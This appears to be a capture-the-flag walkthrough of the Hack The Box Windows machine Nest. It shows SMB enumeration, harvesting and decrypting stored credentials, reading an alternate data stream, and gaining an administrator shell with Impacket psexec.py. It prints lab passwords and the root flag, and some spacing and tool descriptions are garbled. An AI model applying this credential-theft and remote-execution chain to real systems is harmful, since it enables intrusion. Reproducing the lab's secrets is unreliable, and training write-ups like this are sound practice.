htb-nest-nl

Hack the box Nest (IP: 10.10.10.178) is a recently released Windows machine. The unintentional way to own the box using Metasploit no longer works, because the HTB men have patched the machine.

RECONNAISSANCE

I recently got introduced to a tool called AutoRecon. https://github.com/Tib3rius/AutoRecon . This actually gives a nice report in a text format with correctly categorized results in the different folders.

Before I left AutoRecon to the task, used nmap to start the scan. The scan result shows two open ports (SMB 2: 445 and port 4386).

root @ kali: ~ / htb / nest # nmap -sS -sV -sC -oN nmap.txt -Pn 10.10.10.178
Starting Nmap 7.80 (https://nmap.org) at 2020-02-04 03:44 EST
Nmap scan report for nest.htb (10.10.10.178)
Host is up (0.086s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
445 / tcp open microsoft ds?

Host script results:
| _clock-skew: 1m45s
| smb2-security-mode:
| 2.02:
| _ Message signing enabled but not required
| smb2-time:
| date: 2020-02-04T08: 47: 09
| _ start_date: 2020-02-04T05: 55: 06

Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 65.37 seconds
root @ kali: /opt/AutoRecon/results/10.10.10.178/scans# cat smbmap-share-permissions.txt 
[+] Finding open SMB ports ....
[+] User SMB session establishd on 10.10.10.178 ...
[+] IP: 10.10.10.178:445 Name: nest.htb 
Disk Permissions
---- -----------
[!] Access Denied
[+] Finding open SMB ports ....
[+] Guest SMB session established on 10.10.10.178 ...
[+] IP: 10.10.10.178:445 Name: nest.htb 
Disk Permissions
---- -----------
ADMIN $ NO ACCESS
C $ NO ACCESS
Data READ ONLY
IPC $ NO ACCESS
Secure $ NO ACCESS
Users READ ONLY
root @ kali: /opt/AutoRecon/results/10.10.10.178/scans# cat smbmap-list-contents.txt 
[+] Finding open SMB ports ....
[+] User SMB session establishd on 10.10.10.178 ...
[+] IP: 10.10.10.178:445 Name: nest.htb 
Disk Permissions
---- -----------
[!] Access Denied
[+] Finding open SMB ports ....
[+] Guest SMB session established on 10.10.10.178 ...
[+] IP: 10.10.10.178:445 Name: nest.htb 
Disk Permissions
---- -----------
ADMIN $ NO ACCESS
C $ NO ACCESS
Data READ ONLY
. \
dr - r - r-- 0 Wed Aug 7 18:53:46 2019.
dr - r - r-- 0 Wed Aug 7 18:53:46 2019 ..
dr - r - r-- 0 Wed Aug 7 18:58:07 2019 IT
dr - r - r-- 0 Mon Aug 5 17:53:41 2019 Production
dr - r - r-- 0 Mon Aug 5 17:53:50 2019 Reports
dr - r - r-- 0 Wed Aug 7 15:07:51 2019 Shared
. \\ Shared \
dr - r - r-- 0 Wed Aug 7 15:07:51 2019.
dr - r - r-- 0 Wed Aug 7 15:07:51 2019 ..
dr - r - r-- 0 Wed Aug 7 15:07:33 2019 Maintenance
dr - r - r-- 0 Wed Aug 7 15:08:07 2019 Templates
. \\ Shared \ Maintenance \
dr - r - r-- 0 Wed Aug 7 15:07:33 2019.
dr - r - r-- 0 Wed Aug 7 15:07:33 2019 ..
-r - r - r-- 48 Wed Aug 7 15:07:32 2019 Maintenance Alerts.txt
. \\ Shared \ Templates \
dr - r - r-- 0 Wed Aug 7 15:08:07 2019.
dr - r - r-- 0 Wed Aug 7 15:08:07 2019 ..
dr - r - r-- 0 Wed Aug 7 15:08:10 2019 HR
dr - r - r-- 0 Wed Aug 7 15:08:07 2019 Marketing
. \\ Shared \ Templates \ HR \
dr - r - r-- 0 Wed Aug 7 15:08:10 2019.
dr - r - r-- 0 Wed Aug 7 15:08:10 2019 ..
-r - r - r-- 425 Wed Aug 7 18:55:36 2019 Welcome Email.txt
IPC $ NO ACCESS
Secure $ NO ACCESS
Users READ ONLY
. \
dr - r - r-- 0 Sat Jan 25 18:04:21 2020.
dr - r - r-- 0 Sat Jan 25 18:04:21 2020 ..
dr - r - r-- 0 Fri Aug 9 11:08:23 2019 Administrator
dr - r - r-- 0 Sun Jan 26 02:21:44 2020 C. Smith
dr - r - r-- 0 Thu Aug 8 13:03:29 2019 L.Frost
dr - r - r-- 0 Thu Aug 8 13:02:56 2019 R. Thompson
dr - r - r-- 0 Wed Aug 7 18:56:02 2019 TempUser
.

I found many SMB shares, in one of the shares there is a Welcome Email.txt file which looked like an email template that HR used to send to the newly joined employees. The template has a default username and password, tempuser: welcome2019

Since I have the login credentials of a standard user, I started exploring the box and found an interesting XML configuration file in \ IT \ Configs \ RU Scanner \. The file actually had credentials from a user C. Smith in an encrypted format.

c.smith: fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE =

I spent a few minutes decrypting the password using online tools, but nothing helped me so I decided to spend time on the machine instead. I spent some time on the machine as I was suggested to find useful files in the data / IT / Carl / VB Projects folder so I did.

The NotepadPlusPlus folder contains two XML files. One is config.xml which has a code snippet at the end of the file that displays the user’s file access history. The list shows that the TempUser opened a file called “Temp.txt” from another user’s shared folder “Carl”. When I tried to list the folders in the IT folder, I was not given permission, but I was able to list Carl’s content directly.

OBTAIN USER

Since the machine is currently too buggy, I decided to download the entire “VB Projects” folder to my machine and find out the hint. The VB project folder contains two subfolders, Production and WIP. The WIP contains a Visual Basic project called “RUSScanner”. I copied the entire folder to my Windows host computer and opened the project with MS Visual Studio.

As I went through the code I noticed that this program is a decrypter and I may be able to decipher the C. Smith password I found earlier.

When I debugged the project I had the below error. There is a configuration file that needs to be loaded first, I couldn’t find the configuration file so I disabled it and from the main module and added the username and password I found.

My edited main function in Module1 looks like below. After changing the code I added a breakpoint at End Sub so that debugging stops at this breakpoint and I decrypted the password.

Now I have the password of user C.Smith: xRxRxPANCAK3SxRxRx.

C.Smith has a “HQK Reporting” folder, inside there are some files and a folder that seemed interesting, let’s download it.

ALTERNATE DATA STREAMS (ADS):

The file “Debug Mode Password.txt” in the HQK Reporting is an example of Windows Alternate Data Stream file attributes.

In the ADS, the content in the $ Data is always empty. If you find that the file “Debug Mode Password.txt” is actually a file with the “0” size, but the file contains the debug mode password.

To open / read the file, the file must be downloaded directly from Windows. If you download the file from your * nix machine, you will lose the contents and the file will become unworthy.

I used the Windows drive folder function to map the drive (//10.10.10.178/Users/C.Smith/) and download the file directly to my host computer. The PowerShell command -Stream * below will show the hidden stream name. The PowerShell command revealed the stream name as “Password”. For the next command, use “type” to read the actual password. In our case, the password is: WBQ201953D8w

I used telnet to connect the machine to the second port (4386) that we discovered in the first port scan. After connecting to Telnet, I used the debug password to enable debug mode.

> showquery 2 Domain = nest.local Port = 389 BaseOu = OU = WBQ Users, OU = Production, DC = nest, DC = local User = Administrator Password = yyEq0Uvvhq2uQOcWG8peLoeRQehqip / fKdeG / kjEVb4 =

COMPILING THE BINARY

The administrator password can be decrypted using the binary file in the directory of user C. Smith. This binary file can be downloaded to your Windows machine using the Windows network drive mapping function or from the “net view” command from the command prompt.

I download the file to a folder on my desktop using the drive folder. The binary file can be compiled with any binary compiler.

for example dnSpy: https://github.com/0xd4d/dnSpy/releases

I open the file with my debugger and start analyzing MainModule (). The two warning messages in the screenshot below caught my attention:

To run the binary, we need 2 main things, otherwise the binary will fail. We need a configuration file and a file named “HqDbImport.exe”. The configuration file was located in the LDAP folder, this can be easily copied to Notepad and I can make a duplicate. But I couldn’t find HqDbIport.exe, I checked the arguments of the binaries, but I found nowhere that this file was named after the MainModule. So I decided to make a duplicate of HqkLdap.exe and rename it to HqDbImport.exe and put it in a separate folder. I created a .config file with the content below.

So now I have 3 files in the new folder ready to run to decrypt the admin password:

After running the binary command line, I immediately got the administrator password decrypted.

Administrator: XtH4nkS4Pl4y1nGX

Now I am on the final step before entering the root of the system. I am using Impacket / PSExec to login to the system.

root @ kali: ~ / htb / nest # psexec.py Administrator: XtH4nkS4Pl4y1nGX@10.10.10.178
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.178 .....
[*] Found writable share ADMIN $
[*] Uploading file wqVdOFDs.exe
[*] Opening SVCManager on 10.10.10.178 .....
[*] Creating service AGLN on 10.10.10.178 .....
[*] Starting service AGLN .....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C: \ Windows \ system32> cd c: \ users \ administrator \ desktop

c: \ Users \ Administrator \ Desktop> type root.txt
6594c2eb084bc0f08a42f0b94b878c41
c: \ Users \ Administrator \ Desktop>

Author: Puckiestyle

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *